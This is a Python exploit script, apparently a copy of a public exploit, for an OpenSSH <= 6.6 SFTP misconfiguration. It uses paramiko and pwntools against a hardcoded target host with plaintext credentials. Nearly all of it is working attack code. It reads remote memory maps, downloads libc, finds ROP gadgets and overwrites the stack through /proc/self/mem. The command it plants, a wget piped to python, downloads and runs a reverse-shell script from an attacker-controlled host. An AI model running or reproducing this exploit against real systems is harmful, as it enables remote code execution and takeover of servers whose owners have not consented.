# OpenSSH <= 6.6 SFTP misconfiguration exploit for 32/64bit Linux# The origina

1. # OpenSSH <= 6.6 SFTP misconfiguration exploit for 32/64bit Linux
2. # The original discovery by Jann Horn: http://seclists.org/fulldisclosure/2014/Oct/35
3. #
4. # Adam Simuntis :: https://twitter.com/adamsimuntis
5. # Mindaugas Slusnys :: https://twitter.com/mislusnys
6.  
7. import paramiko
8. import sys
9. import time
10. from pwn import *
11.  
12. # parameters
13. cmd = '/usr/bin/wget http://10.10.14.19:8000/rev.py | python'
14. host = '10.10.10.66'
15. port = 2222
16. username = 'ftpuser'
17. password = '@whereyougo?'
18.  
19. # connection
20. ssh = paramiko.SSHClient()
21. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
22. ssh.connect(hostname = host, port = port, username = username, password = password)
23. sftp = ssh.open_sftp()
24.  
25. # parse /proc/self/maps to get addresses
26. log.info("Analysing /proc/self/maps on remote system")
27. sftp.get('/proc/self/maps','maps')
28. with open("maps","r") as f:
29. lines = f.readlines()
30. for line in lines:
31. words = line.split()
32. addr = words[0]
33. if ("libc" in line and "r-xp" in line):
34. path = words[-1]
35. addr = addr.split('-')
36. BITS = 64 if len(addr[0]) > 8 else 32
37. print "[+] {}bit libc mapped @ {}-{}, path: {}".format(BITS, addr[0], addr[1], path)
38. libc_base = int(addr[0], 16)
39. libc_path = path
40. if ("[stack]" in line):
41. addr = addr.split("-")
42. saddr_start = int(addr[0], 16)
43. saddr_end = int(addr[1], 16)
44. print "[+] Stack mapped @ {}-{}".format(addr[0], addr[1])
45.  
46. # download remote libc and extract information
47. print "[+] Fetching libc from remote system..\n"
48. sftp.get(str(libc_path), 'libc.so')
49. e = ELF("libc.so")
50. sys_addr = libc_base + e.symbols['system']
51. exit_addr = libc_base + e.symbols['exit']
52.  
53. # gadgets for the RET slide and system()
54. if BITS == 64:
55. pop_rdi_ret = libc_base + next(e.search('\x5f\xc3'))
56. ret_addr = pop_rdi_ret + 1
57. else:
58. ret_addr = libc_base + next(e.search('\xc3'))
59.  
60. print "\n[+] system() @ {}".format(hex(sys_addr))
61. print "[+] 'ret' @ {}".format(hex(ret_addr))
62. if BITS == 64:
63. print "[+] 'pop rdi; ret' @ {}\n".format(hex(pop_rdi_ret))
64.  
65. with sftp.open('/proc/self/mem','rw') as f:
66. if f.writable():
67. print "[+] We have r/w permissions for /proc/self/mem! All Good."
68. else:
69. print "[-] Fatal error. No r/w permission for mem."
70. sys.exit(0)
71.  
72. log.info("Patching /proc/self/mem on the remote system")
73.  
74. stack_size = saddr_end - saddr_start
75. new_stack = ""
76.  
77. print "[+] Pushing new stack to {}.. fingers crossed ;))".format(hex(saddr_start))
78. #sleep(20)
79. if BITS == 32:
80. new_stack += p32(ret_addr) * (stack_size/4)
81. new_stack = cmd + "\x00" + new_stack[len(cmd)+1:-12]
82. new_stack += p32(sys_addr)
83. new_stack += p32(exit_addr)
84. new_stack += p32(saddr_start)
85. else:
86. new_stack += p64(ret_addr) * (stack_size/8)
87. new_stack = cmd + "\x00" + new_stack[len(cmd)+1:-32]
88. new_stack += p64(pop_rdi_ret)
89. new_stack += p64(saddr_start)
90. new_stack += p64(sys_addr)
91. new_stack += p64(exit_addr)
92.  
93. # debug info
94. with open("fake_stack","w") as lg:
95. lg.write(new_stack)
96.  
97. # write cmd to top off the stack
98. f.seek(saddr_start)
99. f.write(cmd + "\x00")
100.  
101. # write the rest from bottom up, we're going to crash at some point
102. for off in range(stack_size - 32000, 0, -32000):
103. cur_addr = saddr_start + off
104.  
105. try:
106. f.seek(cur_addr)
107. f.write(new_stack[off:off+32000])
108. except:
109. print "Stack write failed - that's probably good!"
110. print "Check if you command was executed..."
111. sys.exit(0)
112.  
113. sftp.close()
114. ssh.close()